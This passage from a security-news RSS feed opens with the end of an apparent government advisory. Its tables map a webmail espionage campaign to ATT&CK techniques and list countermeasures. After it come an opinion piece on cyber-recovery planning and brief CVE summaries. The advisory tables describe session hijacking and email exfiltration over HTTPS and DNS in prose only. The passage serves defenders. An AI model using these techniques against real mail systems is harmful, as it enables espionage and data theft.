<p><a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank"><u>T1074.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Principles every enterprise must test before the attack arrives]]></title>
<description><![CDATA[I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.



Imagine this: A major global enterprise, a company mos...]]></description>
<link>https://tsecurity.de/de/3694398/it-security-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694398/it-security-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.</p>



<p class="wp-block-paragraph">Imagine this: A major global enterprise, a company most of us interact with indirectly every single day, wakes up to find its entire digital environment obliterated. Thousands of employees in dozens of offices and remote locations are suddenly offline. Customers are cut off, supply chains grind to a halt and regulators are notified with a chilling admission: “We have no idea when we’ll be back.”</p>



<p class="wp-block-paragraph">This wasn’t ransomware. There was no negotiation, no decryption key to buy, no easy way out. It was destruction — deliberate, coordinated and geopolitically motivated — not monetary.</p>



<p class="wp-block-paragraph">As a chief customer officer who’s worked with countless customers on cyberattack risks, my perspective hits a bit differently than a CISO or a CTO. I see the aftermath, not just the attack surface. I see the faces behind the tickets, the operations team locked out of their own systems, the support agent answering panicked calls at dawn. And I ask: How many organizations have actually stress-tested their response to this scenario — not a hypothetical, but this very real, lights-out event? Here’s what every leader needs to confront today:</p>



<h2 class="wp-block-heading">Recovery is not just a technical exercise</h2>



<p class="wp-block-paragraph">The first assumption to break during a real crisis is <a href="https://www.cio.com/article/4165019/your-cloud-strategy-is-incomplete-without-a-cyber-recovery-plan.html">the belief that recovery is purely technical</a>.</p>



<p class="wp-block-paragraph">Many organizations have done tabletop exercises and have a backup and recovery playbook, so they feel prepared. They can <a>point to</a> backup windows, retention schedules and immutability controls. The moment a true blackout happens, a different reality surfaces. The people who own the recovery steps either do not know each other, lack the authority to make decisions without supervisor approval or need guidance from offline systems.</p>



<p class="wp-block-paragraph">The reality is that technical infrastructure almost always holds up better than human infrastructure. Organizations have built their recovery strategy around the assumption that someone competent will be awake, available and empowered when a cyber event happens.</p>



<p class="wp-block-paragraph">Still, backups are only as good as their independence. Let’s be blunt: If your recovery infrastructure shares identity, authentication or network trust with your Microsoft tenant (such as Azure, Microsoft 365 or Teams), you don’t actually have a recovery plan; you have a false sense of one — and a liability. A <a href="https://www.veeam.com/company/press-release/veeam-report-reveals-a-market-wide-shift-from-recovery-confidence-to-proven-data-resilience-amid-ransomware-threats-and-ai-adoption.html">recent survey</a> found that while 90% of organizations express confidence in their ability to recover from a cyber incident, fewer than one in three ransomware victims fully recovered their data.</p>



<p class="wp-block-paragraph">True resilience means immutable, air-gapped backups, untouchable by the same compromise. Anything less is an illusion. I talk to customers about their recovery plans constantly. The customers who have rehearsed all scenarios sleep soundly. Those who haven’t? They’re rolling the dice.</p>



<h2 class="wp-block-heading">Most business continuity plans ignore ‘total blackout’</h2>



<p class="wp-block-paragraph">I’ve reviewed hundreds of business continuity plans. Almost all assume partial failures — a region, an application, a data center. But what if every system, in every country, goes dark simultaneously? That’s an entirely different playbook. If your team hasn’t run a drill for a global, simultaneous outage, you’re not prepared. The probability is low, but the cost of being unready is existential.</p>



<p class="wp-block-paragraph">Connected devices, OT systems, field hardware, partner integrations — they all plug into your enterprise network. When the core collapses, it’s not just IT at risk. It’s operational technology, physical safety systems and in regulated sectors, potentially human lives. Understanding and testing those interdependencies is non-negotiable.</p>



<p class="wp-block-paragraph">This is also where boards need to change the conversation. A <a href="https://www.diligent.com/resources/research/cybersecurity-audit">study found</a> that only 5% of companies have cybersecurity experts on their board of directors. Recovery time objectives (RTOs) should not be buried in technical appendices. It’s all jargon to boards. That makes translation essential. RTOs must be explained in terms of business impact. “We can recover in four hours” is a technical statement. “Every hour of downtime costs us $2.3M and creates regulatory exposure in three jurisdictions” is a board statement.</p>



<p class="wp-block-paragraph">That is the level of clarity leaders need.</p>



<p class="wp-block-paragraph">The most prepared organizations do not wait for an incident to educate the board. They bring the conversation forward proactively. They frame recovery in business terms: revenue, regulatory standing, customer trust and brand reputation.</p>



<p class="wp-block-paragraph">The most effective framing is often simple. Show the most critical systems. Show what happens if each one is down for one hour, four hours, 24 hours and 72 hours. Show the current recovery capability against each and then show the gap.</p>



<p class="wp-block-paragraph">If your board is not demanding real answers, your business continuity strategy is likely underfunded and your business is exposed. This is a risk conversation worth forcing because the consequences do not stay inside IT. They can show up in customer churn or missed revenue and ruin an organization’s reputation.</p>



<h2 class="wp-block-heading">Threat intelligence must be actionable, not archived</h2>



<p class="wp-block-paragraph">Geopolitical attacks, hacktivist campaigns and nation-state targeting aren’t abstract threats. They are active risks, and that intelligence cannot languish in the security team’s inbox. Executive leadership must be looped in — and immediately — so gaps can be closed before they’re exploited. Too often, intelligence enters the security operations function and never reaches the teams responsible for recovery infrastructure or executive decision-making.</p>



<p class="wp-block-paragraph">If a threat actor is targeting a specific class of backup agents, the team responsible for those agents needs to know now, not two weeks from now. If intelligence suggests destructive activity against a sector, recovery owners need to validate isolation, access paths and restoration procedures immediately. If geopolitical tension increases the likelihood of targeting, executive leadership needs to understand what exposure exists and what actions are being taken. The organizations that survive aren’t just the best at incident response. They’re the ones who anticipated, rehearsed and invested <em>before</em> the attack.</p>



<p class="wp-block-paragraph">Part of investing in a recovery strategy requires closing the loop between signal and action. The most prepared organizations have already mapped their critical recovery dependencies to specific threat categories. When intelligence touches one of those categories, there is a named owner and a clear set of actions. No guessing or forwarding emails into the void is needed because the distance between the warning and the employees’ ability to do something is shortened.</p>



<p class="wp-block-paragraph">Looking ahead, the conversation will continue to evolve beyond traditional cyber response. Because in an AI-enabled enterprise, the new question is whether the data within those systems can still be trusted. When AI systems make decisions based on enterprise data, the attack surface becomes the data’s accuracy. A threat actor who quietly corrupts a dataset over 90 days before a recovery event has done more damage than just downtime. They can poison the inputs driving decisions across the business.</p>



<p class="wp-block-paragraph">Regardless of how AI will change threat intelligence and cyber response, these principles remain the same. Know your problem, whether structural or technological. Ensure your human infrastructure keeps pace with your technical infrastructure, with clear cross-functional ownership and the tools and knowledge to act autonomously. Communicate with your boards often — and correctly.</p>



<p class="wp-block-paragraph">Let’s not wait for the next headline to ask, “Are we ready?” Have those conversations <em>now</em>. Test your assumptions. Close your gaps. Because in today’s threat landscape, resilience isn’t IT’s job — it’s everyone’s mandate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15437 | LigeroSmart up to 6.1.24 Environment Variable REQUEST_URI cross site scripting (Issue 278 / EUVD-2026-0702)]]></title>
<description><![CDATA[A vulnerability has been found in LigeroSmart up to 6.1.24 and classified as problematic. This affects an unknown part of the component Environment Variable Handler. Performing a manipulation of the argument REQUEST_URI results in cross site scripting.

This vulnerability was named CVE-2025-15437...]]></description>
<link>https://tsecurity.de/de/3694047/sicherheitsluecken/cve-2025-15437-ligerosmart-up-to-6124-environment-variable-requesturi-cross-site-scripting-issue-278-euvd-2026-0702/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694047/sicherheitsluecken/cve-2025-15437-ligerosmart-up-to-6124-environment-variable-requesturi-cross-site-scripting-issue-278-euvd-2026-0702/</guid>
<pubDate>Sat, 25 Jul 2026 16:33:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/ligerosmart">LigeroSmart up to 6.1.24</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the component <em>Environment Variable Handler</em>. Performing a manipulation of the argument <em>REQUEST_URI</em> results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-15437">CVE-2025-15437</a>. The attack may be initiated remotely. In addition, an exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-30309 | InfCode code injection]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in InfCode. The affected element is an unknown function. Performing a manipulation results in code injection.

This vulnerability was named CVE-2026-30309. The attack may be initiated remotely. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3694043/sicherheitsluecken/cve-2026-30309-infcode-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694043/sicherheitsluecken/cve-2026-30309-infcode-code-injection/</guid>
<pubDate>Sat, 25 Jul 2026 16:33:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/infcode">InfCode</a>. The affected element is an unknown function. Performing a manipulation results in code injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-30309">CVE-2026-30309</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20915 | Checkmk up to 2.5.0b1 cross site scripting]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Checkmk up to 2.5.0b1. Affected is an unknown function. The manipulation results in cross site scripting.

This vulnerability was named CVE-2026-20915. The attack may be performed from remote. There is no available exploit.

Upgradin...]]></description>
<link>https://tsecurity.de/de/3694040/sicherheitsluecken/cve-2026-20915-checkmk-up-to-250b1-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694040/sicherheitsluecken/cve-2026-20915-checkmk-up-to-250b1-cross-site-scripting/</guid>
<pubDate>Sat, 25 Jul 2026 16:33:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/checkmk">Checkmk up to 2.5.0b1</a>. Affected is an unknown function. The manipulation results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-20915">CVE-2026-20915</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[1,500 curl authors]]></title>
<description><![CDATA[It takes a village to make curl. A rather big village. I have not been a solo maintainer of curl for a long time and I don’t even do half of the commits anymore Since today, the curl git repository holds the accumulated efforts from 1,500 separate and named individuals. Only 4.5 years since we … ...]]></description>
<link>https://tsecurity.de/de/3694038/tools/1500-curl-authors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694038/tools/1500-curl-authors/</guid>
<pubDate>Sat, 25 Jul 2026 16:32:52 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It takes a village to make curl. A rather big village. I have not been a solo maintainer of curl for a long time and I don’t even do half of the commits anymore Since today, the curl git repository holds the accumulated efforts from 1,500 separate and named individuals. Only 4.5 years since we … <a href="https://daniel.haxx.se/blog/2026/07/25/1500-curl-authors/" class="more-link">Continue reading <span class="screen-reader-text">1,500 curl authors</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12617 | ISC BIND 9 up to 9.18.50/9.18.50-S1/9.20.24/9.20.24-S1 named input validation (Nessus ID 329500)]]></title>
<description><![CDATA[A vulnerability was found in ISC BIND 9 up to 9.18.50/9.18.50-S1/9.20.24/9.20.24-S1. It has been rated as critical. Affected by this issue is some unknown functionality of the component named. The manipulation leads to improper input validation.

This vulnerability is documented as CVE-2026-12617...]]></description>
<link>https://tsecurity.de/de/3694010/sicherheitsluecken/cve-2026-12617-isc-bind-9-up-to-9185091850-s19202492024-s1-named-input-validation-nessus-id-329500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694010/sicherheitsluecken/cve-2026-12617-isc-bind-9-up-to-9185091850-s19202492024-s1-named-input-validation-nessus-id-329500/</guid>
<pubDate>Sat, 25 Jul 2026 16:02:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/isc:bind_9">ISC BIND 9 up to 9.18.50/9.18.50-S1/9.20.24/9.20.24-S1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>named</em>. The manipulation leads to improper input validation.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-12617">CVE-2026-12617</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32971 | OpenClaw up to 2026.3.10 clickjacking (GHSA-rw39-5899-8mxp)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in OpenClaw up to 2026.3.10. This affects an unknown part. The manipulation results in clickjacking.

This vulnerability was named CVE-2026-32971. The attack may be performed from remote. There is no available exploit.

The affected component ...]]></description>
<link>https://tsecurity.de/de/3693861/sicherheitsluecken/cve-2026-32971-openclaw-up-to-2026310-clickjacking-ghsa-rw39-5899-8mxp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693861/sicherheitsluecken/cve-2026-32971-openclaw-up-to-2026310-clickjacking-ghsa-rw39-5899-8mxp/</guid>
<pubDate>Sat, 25 Jul 2026 13:31:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.10</a>. This affects an unknown part. The manipulation results in clickjacking.

